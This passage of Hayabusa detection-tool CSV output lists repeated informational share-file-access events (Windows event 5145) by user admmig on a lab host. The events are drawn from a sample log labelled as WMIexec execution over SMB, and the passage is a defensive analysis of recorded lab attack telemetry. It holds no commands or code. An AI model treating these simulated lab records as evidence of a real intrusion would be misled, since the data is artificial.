+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 